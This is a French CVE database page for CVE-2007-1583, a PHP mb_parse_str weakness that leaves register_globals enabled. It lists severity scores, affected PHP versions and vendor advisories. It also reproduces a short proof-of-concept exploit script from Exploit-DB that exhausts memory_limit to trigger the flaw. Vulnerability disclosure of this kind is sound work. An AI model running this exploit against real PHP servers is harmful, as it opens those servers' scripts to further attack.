CVE-2007-1583 : Détail

CVE-2007-1583

60.61%V3
Network
2007-03-21 22:00 +00:00
2018-10-16 12:57 +00:00

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.
Gestion des alertes

Descriptions

The mb_parse_str function in PHP 4.0.0 through 4.4.6 and 5.0.0 through 5.2.1 sets the internal register_globals flag and does not disable it in certain cases when a script terminates, which allows remote attackers to invoke available PHP scripts with register_globals functionality that is not detectable by these scripts, as demonstrated by forcing a memory_limit violation.

Informations

Metrics

Metric Score Sévérité CVSS Vecteur Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

EPSS Score

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

EPSS Percentile

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 29752

Date de publication : 2007-03-18 23:00 +00:00
Auteur : Stefan Esser
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/23016/info PHP is prone to a weakness that allows attackers to enable the 'register_globals' directive because the application fails to handle a memory-limit exception. Enabling the PHP 'register_globals' directive may allow attackers to further exploit latent vulnerabilities in PHP scripts. This issue is related to the weakness found in the non-multibyte 'parse_str()' from BID 15249 - PHP Parse_Str Register_Globals Activation Weakness. This issue affects PHP 4 to 4.4.6 and 5 to 5.2.1. <?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ // // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ // // |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| // // // // Proof of concept code from the Hardened-PHP Project // // (C) Copyright 2007 Stefan Esser // // // //////////////////////////////////////////////////////////////////////// // PHP mb_parse_str() register_globals Activation Exploit // //////////////////////////////////////////////////////////////////////// // This is meant as a protection against remote file inclusion. die("REMOVE THIS LINE"); // The following string will be parsed and will violate the memory_limit $str = "a=".str_repeat("A", 164000); // This code just fills the memory up to the limit... $limit = ini_get("memory_limit"); if (strpos($limit, "M")) { $limit *= 1024 * 1024; } else if (strpos($limit, "K")) { $limit *= 1024; } else $limit *=1; while ($limit - memory_get_usage(true) > 2048) $x[] = str_repeat("A", 1024); // Will activate register_globals and trigger the memory_limit mb_parse_str($str); ?>

Products Mentioned

Configuraton 0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0

Php>>Php >> Version 4.0.0

Php>>Php >> Version 4.0.1

Php>>Php >> Version 4.0.1

Php>>Php >> Version 4.0.1

Php>>Php >> Version 4.0.2

Php>>Php >> Version 4.0.3

Php>>Php >> Version 4.0.3

Php>>Php >> Version 4.0.4

Php>>Php >> Version 4.0.4

    Php>>Php >> Version 4.0.5

    Php>>Php >> Version 4.0.6

    Php>>Php >> Version 4.0.7

    Php>>Php >> Version 4.0.7

    Php>>Php >> Version 4.0.7

    Php>>Php >> Version 4.0.7

    Php>>Php >> Version 4.1.0

    Php>>Php >> Version 4.1.1

    Php>>Php >> Version 4.1.2

    Php>>Php >> Version 4.2

      Php>>Php >> Version 4.2.0

      Php>>Php >> Version 4.2.1

      Php>>Php >> Version 4.2.2

      Php>>Php >> Version 4.2.3

      Php>>Php >> Version 4.3.0

      Php>>Php >> Version 4.3.1

      Php>>Php >> Version 4.3.2

      Php>>Php >> Version 4.3.3

      Php>>Php >> Version 4.3.4

      Php>>Php >> Version 4.3.5

      Php>>Php >> Version 4.3.6

      Php>>Php >> Version 4.3.7

      Php>>Php >> Version 4.3.8

      Php>>Php >> Version 4.3.9

      Php>>Php >> Version 4.3.10

      Php>>Php >> Version 4.3.11

      Php>>Php >> Version 4.4.0

      Php>>Php >> Version 4.4.1

      Php>>Php >> Version 4.4.2

      Php>>Php >> Version 4.4.3

      Php>>Php >> Version 4.4.4

      Php>>Php >> Version 4.4.5

      Php>>Php >> Version 4.4.6

      Php>>Php >> Version 5.0

        Php>>Php >> Version 5.0

          Php>>Php >> Version 5.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.0

            Php>>Php >> Version 5.0.1

            Php>>Php >> Version 5.0.2

            Php>>Php >> Version 5.0.3

            Php>>Php >> Version 5.0.4

            Php>>Php >> Version 5.0.5

            Php>>Php >> Version 5.1.0

            Php>>Php >> Version 5.1.1

            Php>>Php >> Version 5.1.2

            Php>>Php >> Version 5.1.3

            Php>>Php >> Version 5.1.4

            Php>>Php >> Version 5.1.5

            Php>>Php >> Version 5.1.6

            Php>>Php >> Version 5.2.0

            Php>>Php >> Version 5.2.1

            References

            http://www.vupen.com/english/advisories/2007/2732
            Tags : vdb-entry, x_refsource_VUPEN
            http://secunia.com/advisories/25056
            Tags : third-party-advisory, x_refsource_SECUNIA
            http://www.debian.org/security/2007/dsa-1283
            Tags : vendor-advisory, x_refsource_DEBIAN
            http://security.gentoo.org/glsa/glsa-200705-19.xml
            Tags : vendor-advisory, x_refsource_GENTOO
            http://www.redhat.com/support/errata/RHSA-2007-0162.html
            Tags : vendor-advisory, x_refsource_REDHAT
            http://www.securityfocus.com/bid/23016
            Tags : vdb-entry, x_refsource_BID
            http://us2.php.net/releases/4_4_7.php
            Tags : x_refsource_CONFIRM
            http://secunia.com/advisories/25062
            Tags : third-party-advisory, x_refsource_SECUNIA
            http://www.mandriva.com/security/advisories?name=MDKSA-2007:090
            Tags : vendor-advisory, x_refsource_MANDRIVA
            http://www.ubuntu.com/usn/usn-455-1
            Tags : vendor-advisory, x_refsource_UBUNTU
            http://secunia.com/advisories/24909
            Tags : third-party-advisory, x_refsource_SECUNIA
            http://secunia.com/advisories/24945
            Tags : third-party-advisory, x_refsource_SECUNIA
            http://us2.php.net/releases/5_2_2.php
            Tags : x_refsource_CONFIRM
            http://secunia.com/advisories/24924
            Tags : third-party-advisory, x_refsource_SECUNIA
            http://rhn.redhat.com/errata/RHSA-2007-0155.html
            Tags : vendor-advisory, x_refsource_REDHAT
            http://secunia.com/advisories/24965
            Tags : third-party-advisory, x_refsource_SECUNIA
            http://www.securityfocus.com/bid/25159
            Tags : vdb-entry, x_refsource_BID
            http://www.mandriva.com/security/advisories?name=MDKSA-2007:089
            Tags : vendor-advisory, x_refsource_MANDRIVA
            http://secunia.com/advisories/25445
            Tags : third-party-advisory, x_refsource_SECUNIA
            http://secunia.com/advisories/25057
            Tags : third-party-advisory, x_refsource_SECUNIA
            http://www.mandriva.com/security/advisories?name=MDKSA-2007:088
            Tags : vendor-advisory, x_refsource_MANDRIVA
            http://secunia.com/advisories/26235
            Tags : third-party-advisory, x_refsource_SECUNIA
            http://www.redhat.com/support/errata/RHSA-2007-0153.html
            Tags : vendor-advisory, x_refsource_REDHAT
            Cliquez sur le bouton à gauche (OFF), pour autoriser l'inscription de cookie améliorant les fonctionnalités du site. Cliquez sur le bouton à gauche (Tout accepter), pour ne plus autoriser l'inscription de cookie améliorant les fonctionnalités du site.